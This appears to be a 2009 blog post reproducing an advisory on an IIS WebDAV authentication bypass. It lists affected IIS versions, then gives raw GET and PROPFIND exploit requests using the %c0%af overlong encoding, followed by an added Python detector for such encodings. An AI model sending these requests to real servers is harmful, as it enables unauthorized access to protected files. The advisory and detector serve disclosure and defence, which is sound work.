
Microsoft IIS Unicode Requests to WebDAV Multiple Authentication Bypass Vulnerabilities

by 잡다한 처리 2009. 5. 19.



Microsoft Internet Information Service (IIS) is prone to multiple authentication-bypass vulnerabilities because the application fails to properly enforce access restrictions on certain requests to password-protected WebDAV folders.

An attacker can exploit these issues to gain unauthorized access to protected WebDAV resources, which may lead to other attacks.

* Affected versions
Microsoft IIS 6.0
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition

Microsoft IIS 5.1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
+ Microsoft Windows XP 64-bit Edition SP1
+ Microsoft Windows XP 64-bit Edition
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
+ Microsoft Windows XP Professional SP1
+ Microsoft Windows XP Professional

Microsoft IIS 5.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
+ Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
+ Microsoft Windows 2000 Server

* Exploit Code
GET /..%c0%af/protected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: www.example.com

GET /prot%c0%afected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: www.example.com

PROPFIND /protec%c0%afted/ HTTP/1.1
Host: www.example.com
User-Agent: neo/0.12.2
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>
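
* Detection example (added here; not part of the original advisory or post)
The requests above hide a "/" inside the overlong UTF-8 form %c0%af, which is never valid UTF-8. The sketch below flags such forms in raw request lines; it generalizes to all 2-byte and 3-byte overlong forms and assumes the log keeps the undecoded request target. Function names and sample lines are constructed for illustration.

```python
import re

# A run of consecutive percent-escapes in a raw (undecoded) request target.
_ESCAPES = re.compile(r"(?:%[0-9A-Fa-f]{2})+")

def _is_cont(b):
    """True if b is a UTF-8 continuation byte (10xxxxxx)."""
    return b is not None and 0x80 <= b <= 0xBF

def overlong_sequences(target):
    """Return (escape, hidden_char) for each overlong UTF-8 form in target."""
    hits = []
    for run in _ESCAPES.finditer(target):
        raw = bytes.fromhex(run.group(0).replace("%", ""))
        i = 0
        while i < len(raw):
            b1 = raw[i]
            b2 = raw[i + 1] if i + 1 < len(raw) else None
            b3 = raw[i + 2] if i + 2 < len(raw) else None
            if b1 in (0xC0, 0xC1) and _is_cont(b2):
                # Two bytes spent on a code point below U+0080.
                cp, n = ((b1 & 0x1F) << 6) | (b2 & 0x3F), 2
            elif b1 == 0xE0 and b2 is not None and 0x80 <= b2 <= 0x9F and _is_cont(b3):
                # Three bytes spent on a code point below U+0800.
                cp, n = ((b2 & 0x3F) << 6) | (b3 & 0x3F), 3
            else:
                i += 1
                continue
            esc = "".join("%%%02x" % x for x in raw[i:i + n])
            hits.append((esc, chr(cp)))
            i += n
    return hits

def scan_requests(lines):
    """Return (line_no, method, findings) for request lines with overlong forms."""
    flagged = []
    for no, line in enumerate(lines, 1):
        parts = line.split()
        if len(parts) >= 2:
            found = overlong_sequences(parts[1])
            if found:
                flagged.append((no, parts[0], found))
    return flagged

# Constructed sample request lines; paths reuse the advisory's examples.
SAMPLE = [
    "GET /protected/protected.zip HTTP/1.1",
    "GET /prot%c0%afected/protected.zip HTTP/1.1",
    "PROPFIND /protec%c0%afted/ HTTP/1.1",
    "GET /docs/%c3%a9%ed%95%9c.txt HTTP/1.1",  # valid UTF-8, must not be flagged
    "GET /..%c0%af/protected/protected.zip HTTP/1.1",
]
```

scan_requests(SAMPLE) flags lines 2, 3 and 5 and reports that each %c0%af decodes to "/", while the legitimately encoded non-ASCII path on line 4 passes.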
